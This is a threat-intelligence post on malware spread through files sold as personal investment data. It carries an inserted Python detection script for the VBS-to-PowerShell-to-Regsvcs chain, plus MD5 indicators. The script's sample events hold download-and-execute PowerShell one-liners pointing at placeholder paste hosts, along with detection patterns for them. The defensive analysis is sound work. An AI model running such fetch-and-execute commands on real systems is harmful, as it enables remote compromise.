Personal Information Sales Used as Bait to Distribute Malware

by Prapattimynk, Saturday, 2 December 2023 (3 months ago)

AhnLab Security Emergency response Center (ASEC) discovered a case of malware distribution that used personal information sales as bait. The attack relies on a social engineering technique. This post describes the recently discovered circumstances of this distribution.

Figure 1. Distribution site used by the threat actor

Figure 1 shows the content of the website used by the threat actor as a distribution site, with multiple files. Most of the files contain personal information, and the file names include investment-related keywords such as ‘reading,’ ‘unlisted,’ ‘day trading,’ and ‘mid to long term.’

Figure 2. coin.xlsx file content
Figure 3. DD10.25.xlsx file content
Figure 4. 10.25kaka.xlsx file content

On the malware distribution site, the threat actor hosted files containing over 8,500 pieces of personal information in total. Aside from names and phone numbers, some files also held personal investment amounts and credit ratings.

Figure 5. Initial distribution script
Figure 6. win64.vbs script content
Figure 7. PowerShell command run by win64.vbs

This personal data was confirmed to have been used by the malware distributor, disguised as data for sale, to propagate malware (see Figure 5). The initial script downloads and executes both the script in Figure 6, which performs the actual infection, and the personal data file. Because the executed malware is not shown as a script and the personal information file opens as expected, it is difficult for the user to notice the infection.

Figure 6 shows the content of the file win64.vbs that appears in the Figure 1 list. Encoded strings are substituted, decoded, and run through PowerShell. The executed command is fairly simple: it reads the string hosted at the textbin address, decodes it from base64, and executes it. Ultimately, the command downloads and runs the file base64.txt from the list shown in Figure 1.

Figure 8. Part of the executed malware features

The executed malware has the same features as RAT (remote access trojan) types, which allow remote control. Its features include autorun registration, executing scripts, downloading additional files, executing the downloaded files through Regsvcs.exe (a legitimate process), and performing a reverse connection.
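The two behaviors described above, the win64.vbs to PowerShell chain that fetches a base64 string from a text-bin address and executes it (Figure 7), and the later use of Regsvcs.exe to run downloaded files, both leave traces in process-creation telemetry. The following triage script is an added example for defenders and is not part of the ASEC post or its IOCs: the heuristics, the event record layout (Sysmon Event ID 1 style fields) and every sample command line, host name and path are constructed placeholders. It decodes `-EncodedCommand` arguments (UTF-16LE, as PowerShell expects), looks for the download, base64-decode and execute trio, flags fetches from paste-style hosts, and flags Regsvcs.exe loading an assembly from a user-writable path or from a script or shell parent.

```python
"""Heuristic triage of process-creation events for the VBS -> PowerShell -> base64 chain and
the Regsvcs.exe execution described in the post. Added example for illustration; the heuristics
and all sample events are constructed and are not ASEC's detection logic or the post's IOCs."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field layout is assumed)."""
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line


# Download -> base64-decode -> execute pattern (assumed heuristics, not ASEC's rule).
DOWNLOAD_RE = re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod|\birm\b", re.I)
DECODE_RE = re.compile(r"FromBase64String", re.I)
EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
# Paste/text-bin style hosts; 'textbin' comes from the post, the others are generic additions.
PASTE_HOST_RE = re.compile(r"https?://[^\s'\"]*(?:textbin|pastebin|paste)", re.I)
# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:users|appdata|temp|programdata)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script (PowerShell uses UTF-16LE), or None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: ProcEvent) -> list:
    """Return the list of heuristic findings for one event (empty list means nothing flagged)."""
    findings = []
    image, parent = basename(ev.image), basename(ev.parent)
    text = ev.cmdline
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded_command")
        text = f"{text} {decoded}"  # inspect the decoded script as well as the wrapper
    if image in ("powershell.exe", "pwsh.exe"):
        if parent in ("wscript.exe", "cscript.exe"):
            findings.append("powershell_from_script_host")
        if DOWNLOAD_RE.search(text) and DECODE_RE.search(text) and EXEC_RE.search(text):
            findings.append("download_decode_execute")
        if PASTE_HOST_RE.search(text):
            findings.append("paste_site_fetch")
    if image == "regsvcs.exe":
        # Regsvcs.exe registers .NET assemblies; a payload under a user-writable path or a
        # script/shell parent is unusual for legitimate installs (assumed heuristic).
        if USER_WRITABLE_RE.search(text) or parent in SCRIPT_HOSTS:
            findings.append("regsvcs_suspicious_load")
    return findings


def triage_all(events):
    """Map each event index to its findings, keeping only flagged events."""
    return {i: f for i, ev in enumerate(events) if (f := triage_event(ev))}


# Constructed sample events (hosts and paths are placeholders, not real indicators).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://paste.example/raw/PLACEHOLDER')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              "powershell.exe -nop -w hidden -c \"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
              "(New-Object Net.WebClient).DownloadString('https://textbin.example/raw/PLACEHOLDER'))))\""),
    ProcEvent(r"C:\Windows\explorer.exe", PS, f"powershell.exe -w hidden -enc {ENCODED}"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -Command Get-ChildItem C:\\Users\\victim\\Documents"),
    ProcEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe",
              r"RegSvcs.exe C:\Users\victim\AppData\Local\Temp\stage.dll"),
]

if __name__ == "__main__":
    for i, f in triage_all(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i].image), f)
```

Run stand-alone, the script flags the wscript-to-PowerShell event on three counts, the encoded-command event on two, the Regsvcs.exe event once, and leaves the ordinary `Get-ChildItem` invocation alone. In a real pipeline the same functions would be fed from Sysmon or EDR process events; the decoded `-EncodedCommand` text is what makes the nested download visible, since the wrapper command line alone reveals nothing.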

This post examined the circumstances of malware distribution using personal information as bait. The files covered in this post contained multiple keywords such as ‘reading,’ ‘unlisted,’ and ‘day trading.’ Such indiscriminately collected personal data is not encrypted when stored and can be reused for malware distribution once leaked. Users must be cautious of unauthorized group chats that offer investment information.

File Detection
Trojan/VBS.Runner (2023.11.21.00)
Trojan/Win.Agent.C426491 (2021.06.30.03)
Backdoor/Win.AsyncRat.C5372433 (2023.02.02.03)
Dropper/Win.Generic.C5499482 (2023.10.02.00)

Behavior Detection
Execution/MDP.Powershell.M2514

[IOC]
MD5
a377d92101121294088e02b01624f19c
ebaa2ad4d3b7e88424e9db4c860d7558
d3d5f947a872d50fd2addfecfa2b2276
27218824d5b1da553e3d65f2a4a0f974
f963a7bf7b1377d78813c90dd649f512

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
